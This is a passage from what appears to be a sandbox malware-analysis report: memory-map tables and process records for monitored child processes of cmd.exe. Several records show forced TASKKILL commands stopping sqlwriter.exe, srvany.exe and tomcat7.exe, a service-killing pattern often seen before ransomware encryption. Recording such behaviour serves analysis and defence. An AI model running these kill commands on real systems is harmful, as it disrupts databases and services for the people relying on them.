|
|
|
|
| ntdsapi.dll | 0x74b70000 | 0x74b87fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemsvc.dll | 0x74b90000 | 0x74b9efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| winsta.dll | 0x74ba0000 | 0x74bc8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemcomn.dll | 0x74bd0000 | 0x74c2bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemprox.dll | 0x74c30000 | 0x74c39fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wkscli.dll | 0x74c40000 | 0x74c4efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| netutils.dll | 0x74c50000 | 0x74c58fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| netapi32.dll | 0x74c60000 | 0x74c70fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wtsapi32.dll | 0x74c80000 | 0x74c8cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| framedynos.dll | 0x74c90000 | 0x74cc4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| srvcli.dll | 0x75330000 | 0x75348fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptbase.dll | 0x753f0000 | 0x753fbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sspicli.dll | 0x75400000 | 0x7545ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msvcrt.dll | 0x755a0000 | 0x7564bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| advapi32.dll | 0x763f0000 | 0x7648ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| clbcatq.dll | 0x76490000 | 0x76512fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernel32.dll | 0x76520000 | 0x7662ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrt4.dll | 0x76690000 | 0x7677ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| shlwapi.dll | 0x76780000 | 0x767d6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| imm32.dll | 0x767e0000 | 0x7683ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| oleaut32.dll | 0x76910000 | 0x7699efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sechost.dll | 0x769a0000 | 0x769b8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| nsi.dll | 0x76c80000 | 0x76c85fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| usp10.dll | 0x76c90000 | 0x76d2cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ole32.dll | 0x76d30000 | 0x76e8bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| lpk.dll | 0x76ea0000 | 0x76ea9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ws2_32.dll | 0x77130000 | 0x77164fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msctf.dll | 0x771f0000 | 0x772bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x772c0000 | 0x77305fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| user32.dll | 0x77310000 | 0x7740ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| gdi32.dll | 0x77410000 | 0x7749ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000774a0000 | 0x774a0000 | 0x77599fff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000775a0000 | 0x775a0000 | 0x776befff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x776c0000 | 0x77868fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x778a0000 | 0x77a1ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
|
| Information | Value |
|---|---|
| ID | #36 |
| File Name | c:\windows\syswow64\taskkill.exe |
| Command Line | TASKKILL /F /IM sqlwriter.exe /IM sqlwriter.exe |
| Initial Working Directory | C:\Users\kFT6uTQW\Desktop\ |
| Monitor | Start Time: 00:01:32, Reason: Child Process |
| Unmonitor | End Time: 00:02:35, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:03 |
| Remarks | No high level activity detected in monitored regions |
| Information | Value |
|---|---|
| PID | 0x604 |
| Parent PID | 0xbb0 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | XABNCPUWKW\kFT6uTQW |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
BBC
0x
4FC
0x
7CC
0x
780
0x
494
|
| Name | Start VA | End VA | Type | Permissions | Monitored | Dump | YARA Match | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | Readable |
|
|
|
|
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | Readable |
|
|
|
|
| locale.nls | 0x00070000 | 0x000d6fff | Memory Mapped File | Readable |
|
|
|
|
| pagefile_0x00000000000e0000 | 0x000e0000 | 0x000e1fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| taskkill.exe.mui | 0x000f0000 | 0x000f3fff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x0000000000100000 | 0x00100000 | 0x00100fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000110000 | 0x00110000 | 0x0014ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000150000 | 0x00150000 | 0x00150fff | Private Memory | Readable, Writable |
|
|
|
|
| kernelbase.dll.mui | 0x00160000 | 0x0021ffff | Memory Mapped File | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000220000 | 0x00220000 | 0x00220fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000230000 | 0x00230000 | 0x00230fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000240000 | 0x00240000 | 0x0027ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000280000 | 0x00280000 | 0x0028ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000002a0000 | 0x002a0000 | 0x002dffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000002f0000 | 0x002f0000 | 0x0032ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000350000 | 0x00350000 | 0x0038ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000390000 | 0x00390000 | 0x003cffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000003f0000 | 0x003f0000 | 0x0046ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000470000 | 0x00470000 | 0x0056ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000580000 | 0x00580000 | 0x0067ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000680000 | 0x00680000 | 0x00807fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000820000 | 0x00820000 | 0x0085ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000900000 | 0x00900000 | 0x0093ffff | Private Memory | Readable, Writable |
|
|
|
|
| taskkill.exe | 0x00980000 | 0x00995fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x00000000009a0000 | 0x009a0000 | 0x00b20fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000b30000 | 0x00b30000 | 0x01f2ffff | Pagefile Backed Memory | Readable |
|
|
|
|
| sortdefault.nls | 0x01f30000 | 0x021fefff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000002260000 | 0x02260000 | 0x0229ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002320000 | 0x02320000 | 0x0235ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000023e0000 | 0x023e0000 | 0x0241ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002490000 | 0x02490000 | 0x024cffff | Private Memory | Readable, Writable |
|
|
|
|
| dbghelp.dll | 0x6a520000 | 0x6a60afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| fastprox.dll | 0x6a880000 | 0x6a915fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| mpr.dll | 0x73ba0000 | 0x73bb1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64cpu.dll | 0x73fd0000 | 0x73fd7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64win.dll | 0x73fe0000 | 0x7403bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64.dll | 0x74040000 | 0x7407efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| secur32.dll | 0x74080000 | 0x74087fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rsaenh.dll | 0x74460000 | 0x7449afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrtremote.dll | 0x749d0000 | 0x749ddfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptsp.dll | 0x749e0000 | 0x749f5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| version.dll | 0x74b50000 | 0x74b58fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemcomn.dll | 0x74b70000 | 0x74bcbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdsapi.dll | 0x74bd0000 | 0x74be7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemsvc.dll | 0x74bf0000 | 0x74bfefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| winsta.dll | 0x74c00000 | 0x74c28fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wkscli.dll | 0x74c30000 | 0x74c3efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemprox.dll | 0x74c40000 | 0x74c49fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| framedynos.dll | 0x74c50000 | 0x74c84fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| netutils.dll | 0x74c90000 | 0x74c98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| netapi32.dll | 0x74ca0000 | 0x74cb0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wtsapi32.dll | 0x74cc0000 | 0x74cccfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| srvcli.dll | 0x75330000 | 0x75348fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptbase.dll | 0x753f0000 | 0x753fbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sspicli.dll | 0x75400000 | 0x7545ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msvcrt.dll | 0x755a0000 | 0x7564bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| advapi32.dll | 0x763f0000 | 0x7648ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| clbcatq.dll | 0x76490000 | 0x76512fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernel32.dll | 0x76520000 | 0x7662ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrt4.dll | 0x76690000 | 0x7677ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| shlwapi.dll | 0x76780000 | 0x767d6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| imm32.dll | 0x767e0000 | 0x7683ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| oleaut32.dll | 0x76910000 | 0x7699efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sechost.dll | 0x769a0000 | 0x769b8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| nsi.dll | 0x76c80000 | 0x76c85fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| usp10.dll | 0x76c90000 | 0x76d2cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ole32.dll | 0x76d30000 | 0x76e8bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| lpk.dll | 0x76ea0000 | 0x76ea9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ws2_32.dll | 0x77130000 | 0x77164fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msctf.dll | 0x771f0000 | 0x772bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x772c0000 | 0x77305fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| user32.dll | 0x77310000 | 0x7740ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| gdi32.dll | 0x77410000 | 0x7749ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000774a0000 | 0x774a0000 | 0x77599fff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000775a0000 | 0x775a0000 | 0x776befff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x776c0000 | 0x77868fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x778a0000 | 0x77a1ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
|
| Information | Value |
|---|---|
| ID | #37 |
| File Name | c:\windows\syswow64\taskkill.exe |
| Command Line | TASKKILL /F /IM srvany.exe /IM srvany.exe |
| Initial Working Directory | C:\Users\kFT6uTQW\Desktop\ |
| Monitor | Start Time: 00:01:33, Reason: Child Process |
| Unmonitor | End Time: 00:02:35, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:02 |
| Remarks | No high level activity detected in monitored regions |
| Information | Value |
|---|---|
| PID | 0x7b0 |
| Parent PID | 0xbb0 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | XABNCPUWKW\kFT6uTQW |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
35C
0x
638
0x
644
0x
220
0x
444
|
| Name | Start VA | End VA | Type | Permissions | Monitored | Dump | YARA Match | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | Readable |
|
|
|
|
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000070000 | 0x00070000 | 0x00071fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| taskkill.exe.mui | 0x00080000 | 0x00083fff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x0000000000090000 | 0x00090000 | 0x000cffff | Private Memory | Readable, Writable |
|
|
|
|
| locale.nls | 0x000d0000 | 0x00136fff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000000140000 | 0x00140000 | 0x00140fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000150000 | 0x00150000 | 0x00150fff | Private Memory | Readable, Writable |
|
|
|
|
| kernelbase.dll.mui | 0x00160000 | 0x0021ffff | Memory Mapped File | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000220000 | 0x00220000 | 0x00220fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000230000 | 0x00230000 | 0x00230fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000240000 | 0x00240000 | 0x0027ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000280000 | 0x00280000 | 0x002bffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000002e0000 | 0x002e0000 | 0x0031ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000340000 | 0x00340000 | 0x0037ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000003f0000 | 0x003f0000 | 0x0046ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000470000 | 0x00470000 | 0x005f7fff | Pagefile Backed Memory | Readable |
|
|
|
|
| taskkill.exe | 0x00640000 | 0x00655fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x0000000000690000 | 0x00690000 | 0x006cffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000720000 | 0x00720000 | 0x0075ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000007d0000 | 0x007d0000 | 0x008cffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000008d0000 | 0x008d0000 | 0x00a50fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000a80000 | 0x00a80000 | 0x00abffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000ac0000 | 0x00ac0000 | 0x00acffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000ad0000 | 0x00ad0000 | 0x01ecffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000001ed0000 | 0x01ed0000 | 0x01fcffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001fd0000 | 0x01fd0000 | 0x0200ffff | Private Memory | Readable, Writable |
|
|
|
|
| sortdefault.nls | 0x02010000 | 0x022defff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000002310000 | 0x02310000 | 0x0234ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002350000 | 0x02350000 | 0x0238ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002390000 | 0x02390000 | 0x023cffff | Private Memory | Readable, Writable |
|
|
|
|
| fastprox.dll | 0x6a570000 | 0x6a605fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| dbghelp.dll | 0x6a830000 | 0x6a91afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| mpr.dll | 0x73ba0000 | 0x73bb1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64cpu.dll | 0x73fd0000 | 0x73fd7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64win.dll | 0x73fe0000 | 0x7403bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64.dll | 0x74040000 | 0x7407efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| secur32.dll | 0x74080000 | 0x74087fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rsaenh.dll | 0x74460000 | 0x7449afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrtremote.dll | 0x749d0000 | 0x749ddfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptsp.dll | 0x749e0000 | 0x749f5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| version.dll | 0x74b50000 | 0x74b58fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdsapi.dll | 0x74b70000 | 0x74b87fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemsvc.dll | 0x74b90000 | 0x74b9efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| winsta.dll | 0x74ba0000 | 0x74bc8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemcomn.dll | 0x74bd0000 | 0x74c2bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemprox.dll | 0x74c30000 | 0x74c39fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wkscli.dll | 0x74c40000 | 0x74c4efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| netutils.dll | 0x74c50000 | 0x74c58fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| netapi32.dll | 0x74c60000 | 0x74c70fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wtsapi32.dll | 0x74c80000 | 0x74c8cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| framedynos.dll | 0x74c90000 | 0x74cc4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| srvcli.dll | 0x75330000 | 0x75348fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptbase.dll | 0x753f0000 | 0x753fbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sspicli.dll | 0x75400000 | 0x7545ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msvcrt.dll | 0x755a0000 | 0x7564bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| advapi32.dll | 0x763f0000 | 0x7648ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| clbcatq.dll | 0x76490000 | 0x76512fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernel32.dll | 0x76520000 | 0x7662ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrt4.dll | 0x76690000 | 0x7677ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| shlwapi.dll | 0x76780000 | 0x767d6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| imm32.dll | 0x767e0000 | 0x7683ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| oleaut32.dll | 0x76910000 | 0x7699efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sechost.dll | 0x769a0000 | 0x769b8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| nsi.dll | 0x76c80000 | 0x76c85fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| usp10.dll | 0x76c90000 | 0x76d2cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ole32.dll | 0x76d30000 | 0x76e8bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| lpk.dll | 0x76ea0000 | 0x76ea9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ws2_32.dll | 0x77130000 | 0x77164fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msctf.dll | 0x771f0000 | 0x772bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x772c0000 | 0x77305fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| user32.dll | 0x77310000 | 0x7740ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| gdi32.dll | 0x77410000 | 0x7749ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000774a0000 | 0x774a0000 | 0x77599fff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000775a0000 | 0x775a0000 | 0x776befff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x776c0000 | 0x77868fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x778a0000 | 0x77a1ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
|
| Information | Value |
|---|---|
| ID | #38 |
| File Name | c:\windows\syswow64\taskkill.exe |
| Command Line | TASKKILL /F /IM tomcat7.exe /IM tomcat7.exe |
| Initial Working Directory | C:\Users\kFT6uTQW\Desktop\ |
| Monitor | Start Time: 00:01:34, Reason: Child Process |
| Unmonitor | End Time: 00:02:35, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:01 |
| Remarks | No high level activity detected in monitored regions |
| Information | Value |
|---|---|
| PID | 0xbd8 |
| Parent PID | 0xbb0 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | XABNCPUWKW\kFT6uTQW |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
BCC
0x
BD0
0x
BC8
0x
BC4
0x
31C
|
| Name | Start VA | End VA | Type | Permissions | Monitored | Dump | YARA Match | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
|
